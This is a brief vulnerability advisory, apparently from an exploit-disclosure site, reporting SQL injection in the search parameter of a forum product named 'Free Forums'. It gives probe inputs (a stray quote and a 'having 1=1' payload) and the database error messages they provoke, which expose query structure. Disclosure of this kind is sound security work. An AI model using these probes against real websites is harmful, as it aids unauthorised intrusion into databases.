Free Forums "search" Sql Injection

http://Aria-Security.net
Aria-Security Team

Free Forums Sql Injection
Vendor: http://www.nvecs.com/forums

the search parameter hast an sql injection

example:
'having 1=1–

result:

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((Responses.Response ) like '%'having 1=1–%')) Order By Topics.AddDate;'.

or just a simple '

[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'Topics.User like '%'%' Order By Topics.AddDate;'.

Regards,
The-0utl4w
Credit Goes to Aria-Security Team